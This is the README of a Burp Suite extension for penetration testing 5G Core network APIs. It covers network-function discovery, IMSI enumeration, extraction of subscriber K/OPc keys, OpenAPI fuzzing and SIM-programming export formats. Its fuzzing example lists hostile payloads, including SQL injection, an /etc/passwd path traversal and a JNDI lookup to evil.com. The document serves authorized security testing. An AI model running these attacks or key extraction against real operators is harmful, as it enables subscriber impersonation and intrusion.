5GC API Penetration Testing Suite v1.0 - Community Edition
December 1, 2025 Β· View on GitHub
Burp Suite Extension for 5G Core Network Security Testing
π‘ Overview
The 5GC API Penetration Testing Suite is a comprehensive Burp Suite extension designed for security testing of 5G Core (5GC) networks. Developed by Penthertz, this tool automates the discovery, enumeration, and exploitation of vulnerabilities in 5G Service-Based Interfaces (SBI).
This tool is a replacement of 5GC API parser Burp suite extension we have release a few years ago.
Author: SΓ©bastien Dudek @Penthertz
Company: Penthertz - RF Security & Telecommunications Security Experts
License: Apache License 2.0
Version: 1.0 Community Edition
Quick demo
https://github.com/user-attachments/assets/8351c152-0234-4643-91ea-221a20eaabea
β¨ Key Features
π― Automated Attack Scenarios
- Auto-Audit: A little one-click automatical assessment
- Network Function Discovery: Enumerate all 5GC network functions via NRF
- IMSI Enumeration: Discover active subscribers through UDM API
- Credential Extraction: Extract permanent authentication keys (K, OPc) from UDR
- Vulnerability Detection: Automated security issue identification
π Authentication & Security
- OAuth2 Support: 3GPP TS 29.510 OAuth2 workflow (manual token acquisition)
- mTLS Configuration: Mutual TLS authentication support (beta)
- JWT Bearer Tokens: Automatic token injection into requests
- Production Safety: Rate limiting and request delay controls
π Advanced Testing Capabilities
- OpenAPI-based Fuzzing: Load 3GPP YAML specs and fuzz endpoints
- Template-based Fuzzing: Use
$$markers$$for precise payload injection - Request/Response Viewer: Detailed HTTP traffic analysis
- Burp Integration: Send requests to Repeater, report to Scanner
π Rich User Interface
- Dashboard: Real-time statistics and quick actions
- Configuration: Complete 5GC network topology setup
- Discovered Assets: NF and IMSI tables with export
- Credentials: Secure credential management and export (JSON, CSV, pySim)
- Security Issues: Detailed vulnerability reports with request/response evidence
- API Fuzzing: Interactive fuzzing with payload categories
- Activity Log: Comprehensive logging with export
π Network Function Support
- Core NFs: NRF, UDM, UDR, AUSF, AMF, SMF, PCF
- Additional NFs: BSF, NSSF, SMSF, NEF, SCP, SEPP, UPF, and more
- API Versioning: Auto-detection and configuration (v1, v2, v3)
- SCP Proxy: Automatic detection and use of Service Communication Proxy
π οΈ Requirements
Software Requirements
- Burp Suite Professional (recommended) or Community Edition
- Python/Jython 2.7 (included with Burp Suite)
- Java 8+ (for Burp Suite)
Target Environment
- 5G Core Network (e.g., Open5GS, free5GC, commercial 5GC)
- Network access to 5GC SBI interfaces (typically HTTP on port 7777)
- Optional: OAuth2 server for authentication testing
- Optional: mTLS certificates for mutual authentication
3GPP Specifications (Optional)
- 3GPP Release 16/17/18 OpenAPI YAML files
- Available from: jdegre/5GC_APIs
π₯ Installation
Step 1: Download the Extension
git clone https://github.com/PentHertz/5GC_API_pentest
cd 5GC_API_pentest
Note: Ensure you have Jython installed in Burp Suite.
Step 2: Load in Burp Suite
- Open Burp Suite
- Navigate to Extender β Extensions
- Click Add
- Set Extension Type to Python
- Select the
5GC_API_Pentest.pyfile - Click Next
The extension should load successfully with output:
======================================================================
5GC API PENTEST SUITE v1.0 - Burp Extension (Community Edition)
Penthertz Security Research
======================================================================
[+] 5GC API Pentest Suite v1.0 (Community Edition) loaded successfully!
Step 3: Access the Extension
A new tab "5GC API Pentest" will appear in Burp Suite.
π Quick Start Guide
1. Configure Network Function URLs
Go to the Configuration tab:
NRF URL: http://127.0.0.10:7777 <--- At least this one
UDM URL: http://127.0.0.12:7777 (optional)
UDR URL: http://127.0.0.20:7777 (optional)
AUSF URL: http://127.0.0.11:7777 (optional)
AMF URL: http://127.0.0.5:7777 (optional)
SMF URL: http://127.0.0.4:7777 (optional)
Tip: The extension can auto-populate these after NF discovery.
2. Configure IMSI Range
Base IMSI: 999700000000
Start Range: 1
End Range: 100
Workers: 10
3. Run Auto-Audit
Go to the Dashboard tab and click:
π΄ Auto-Audit
This will automatically:
- β Discover all Network Functions
- β Enumerate valid IMSIs
- β Extract authentication credentials
- β Detect security vulnerabilities
4. Review Results
- Discovered Assets: View NFs and IMSIs
- Credentials: Extracted K/OPc keys
- Security Issues: Detailed vulnerability reports
π OAuth2 Configuration (3GPP TS 29.510)
Manual Token Workflow
The extension implements the 3GPP TS 29.510 OAuth2 specification with a manual token acquisition workflow.
Step 1: Configure OAuth2 Parameters
Go to Configuration β OAuth2 / JWT Authentication:
NRF OAuth2 URL: http://127.0.0.10:7777/oauth2/token
NF Instance ID: 12345678-1234-1234-1234-123456789abc
NF Type: AMF
Target NF Type: (optional)
Scope: nnrf-disc nnrf-nfm
Step 2: Generate OAuth2 Request
Click "Generate OAuth2 Request"
The extension will display:
# CURL COMMAND
curl -X POST 'http://127.0.0.10:7777/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d 'grant_type=client_credentials&nfInstanceId=...'
Step 3: Run Request Manually
Option A: Copy curl command and run in terminal
Option B: Click "Send to Burp Repeater" and execute
Step 4: Activate Token
-
Copy the
access_tokenfrom the JSON response:{ "access_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...", "token_type": "Bearer", "expires_in": 3600 } -
Paste the token into "Access Token" field
-
Click "Activate Token" (green button)
Step 5: Enable OAuth
Check: β Enable OAuth2 Bearer Token for all requests
All subsequent requests will include:
Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
π― API Fuzzing
Using 3GPP OpenAPI Specifications
Step 1: Load OpenAPI Directory
-
Download 3GPP specs:
git clone https://github.com/jdegre/5GC_APIs.git -
Use
5GC_API_YAML_file_corrector_for_SnakeYAML.pyagainst this repository to fix unicode and other issues, unless it some YAML will not be correctly parsed -
In Burp Suite, go to API Fuzzing tab, click "Load API Directory..."
-
Select the
5GC_APIs/folder
The extension will parse all YAML files and display available APIs.
Step 2: Select API and Endpoint
- Select API: Click on an API (e.g., "Nudm_SDM")
- Select Endpoint: Choose an endpoint (e.g.,
GET /nudm-sdm/v2/imsi-{imsi}/am-data)
A request template will be generated with $$markers$$:
GET /nudm-sdm/v2/imsi-$$imsi$$/am-data HTTP/1.1
Host: $$host$$
Content-Type: application/json
Accept: application/json
Change markers or other parameters with $$param$$ marker to fuzz them.
Step 3: Configure Fuzzing
Base URL:
http://127.0.0.12:7777
Threads: 5
Delay: 100ms
Step 4: Load Payloads
Option A: Load from file (one payload per line)
Option B: Load by category:
- SQL Injection
- XSS (Cross-Site Scripting)
- Path Traversal
- 5GC Specific - IMSI
Option C: Manual entry:
' OR '1'='1
../../../etc/passwd
999700000000001
${jndi:ldap://evil.com/a}
Step 5: Start Fuzzing
Click "Start Fuzzing"
The extension will:
- Replace each generally marked as
$$param$$with payloads - Send requests and analyze responses
- Detect anomalies (errors, injections, large responses)
- Display results in real-time
Step 6: Review Results
- Click row to view full request/response
- Right-click β "Send to Repeater" for further testing
- Export results for reporting
π€ Export Capabilities
Credentials Export
JSON Format:
{
"timestamp": "2025-01-15 14:30:00",
"total_credentials": 50,
"credentials": [
{
"imsi": "999700000000001",
"k": "465B5CE8B199B49FAA5F0A2EE238A6BC",
"opc": "E8ED289DEBA952E4283B54E88E6183CA",
"sqn": "000000000001",
"amf": "8000"
}
]
}
CSV Format:
IMSI,K,OPc,SQN,AMF,Timestamp
999700000000001,465B5CE8...,E8ED289D...,000000000001,8000,2025-01-15 14:30:00
pySim Format (for SIM card programming):
[
{
"IMSI": "999700000000001",
"Ki": "465B5CE8B199B49FAA5F0A2EE238A6BC",
"OPc": "E8ED289DEBA952E4283B54E88E6183CA",
"ADM1": "00000000",
"ICCID": "8988211000000000001"
}
]
Security Report Export
Comprehensive JSON report including:
- Network Functions discovered
- IMSIs enumerated
- Credentials extracted
- Security issues with request/response evidence
- Configuration snapshot
βοΈ Advanced Configuration
Production Safety Settings
Enable PRODUCTION MODE for safe testing:
β PRODUCTION MODE (enables safety features)
Max Requests/Second: 10
Request Delay (ms): 500
Max Concurrent Threads: 3
Quick Presets
π’ Stealth Mode (Safe):
- 3 workers, 5 req/s, 500ms delay
- IMSI range: 1-100
- Best for: Production testing
π‘ Balanced Mode (Normal):
- 10 workers, 20 req/s, 100ms delay
- IMSI range: 1-1000
- Best for: Lab testing
π΄ Aggressive Mode (Fast):
- 30 workers, 100 req/s, 10ms delay
- IMSI range: 1-10000
- β οΈ Lab environments only!
API Version Configuration
Auto-detect, or manually configure:
NRF API Version: v1
UDM API Version: v2
UDR API Version: v2
AUSF API Version: v1
Click "Auto-Detect Versions" to automatically identify supported versions.
π Common Use Cases
Use Case 1: Unauthenticated NF Discovery
Scenario: Test if NRF allows unauthenticated network function enumeration
Steps:
- Configure NRF URL
- Dashboard β "Discover NFs"
- Review Discovered Assets tab
- Check Security Issues for "Missing Authentication" vulnerability
Expected Finding: High severity issue if authentication is not required
Use Case 2: IMSI Privacy Violation
Scenario: Test if UDM allows IMSI enumeration without authentication
Steps:
- Configure UDM URL and IMSI range
- Dashboard β "Enumerate IMSIs"
- Review discovered IMSIs
- Check for "Privacy Violation" security issue
Expected Finding: High severity if sequential IMSI testing succeeds
Use Case 3: Credential Exposure
Scenario: Test if UDR exposes permanent authentication keys
Steps:
- Run IMSI enumeration first
- Dashboard β "Extract Credentials"
- Review Credentials tab for K/OPc values
- Export credentials for offline analysis
Expected Finding: Critical vulnerability if K/OPc are accessible without authentication
Use Case 4: OAuth2 Implementation Testing
Scenario: Test OAuth2 token workflow and validation
Steps:
- Configure OAuth2 parameters
- Generate and execute token request
- Activate token
- Run attacks with OAuth enabled
- Compare results with/without authentication
Expected Finding: Proper authentication should block unauthorized access
Use Case 5: API Fuzzing for Injection
Scenario: Test for SQL/NoSQL injection vulnerabilities
Steps:
- Load 3GPP OpenAPI specs
- Select UDR authentication endpoint
- Load "SQL Injection" payload category
- Start fuzzing
- Review anomalies (500 errors, error disclosure)
Expected Finding: Properly sanitized inputs should not produce errors
Additional Resources
π License
Copyright 2025 SΓ©bastien Dudek / Penthertz
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
π Acknowledgments
- Open5GS team for open-source 5G Core implementation
- PortSwigger for Burp Suite framework
- jdegre for maintaining 5GC_APIs repository
- The 5G security research community